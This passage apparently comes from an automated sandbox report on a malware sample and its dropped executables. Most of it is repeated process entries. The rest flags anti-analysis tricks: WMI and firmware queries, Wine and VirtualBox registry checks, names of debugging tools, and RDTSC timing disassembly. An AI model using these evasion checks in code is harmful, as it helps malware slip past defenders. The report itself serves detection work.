Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\random.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 80E2C8 second address: 80E2E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5FF4AFF000h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 982D3E second address: 982D5D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5FF4F12455h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9831F3 second address: 983221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF001h 0x00000007 jng 00007F5FF4AFEFF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5FF4AFEFFFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 983221 second address: 983227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985A05 second address: 985A28 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F5FF4AFF000h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985ABD second address: 985AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985CE0 second address: 985CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985CE4 second address: 985CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F5FF4F12446h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985CF2 second address: 985CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985CF6 second address: 985D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 6B6E5027h 0x0000000e mov ecx, 2BFE33B0h 0x00000013 push 00000003h 0x00000015 sub dword ptr [ebp+122D36E3h], esi 0x0000001b push 00000000h 0x0000001d movzx esi, bx 0x00000020 push esi 0x00000021 pop esi 0x00000022 push 00000003h 0x00000024 adc ecx, 33887B24h 0x0000002a call 00007F5FF4F12449h 0x0000002f jmp 00007F5FF4F12454h 0x00000034 push eax 0x00000035 jno 00007F5FF4F1245Bh 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f jmp 00007F5FF4F1244Dh 0x00000044 mov eax, dword ptr [eax] 0x00000046 jmp 00007F5FF4F1244Bh 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f js 00007F5FF4F1244Eh 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985D84 second address: 985DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F5FF4AFEFF8h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 lea ebx, dword ptr [ebp+1244B8F0h] 0x00000026 jmp 00007F5FF4AFF000h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jnp 00007F5FF4AFEFF8h 0x00000034 push esi 0x00000035 pop esi 0x00000036 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985E50 second address: 985EC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5FF4F1244Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jbe 00007F5FF4F1244Ch 0x00000012 mov dword ptr [ebp+122D2A62h], ecx 0x00000018 cmc 0x00000019 push 00000000h 0x0000001b jnl 00007F5FF4F1244Ch 0x00000021 or dword ptr [ebp+122D2153h], edx 0x00000027 call 00007F5FF4F12449h 0x0000002c jnp 00007F5FF4F1244Eh 0x00000032 push ecx 0x00000033 js 00007F5FF4F12446h 0x00000039 pop ecx 0x0000003a push eax 0x0000003b jmp 00007F5FF4F1244Ah 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 push edx 0x00000045 jnp 00007F5FF4F12450h 0x0000004b jmp 00007F5FF4F1244Ah 0x00000050 pop edx 0x00000051 mov eax, dword ptr [eax] 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985EC6 second address: 985ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985ECA second address: 985EF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5FF4F1244Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 985EF8 second address: 985F02 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5FF4AFEFFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
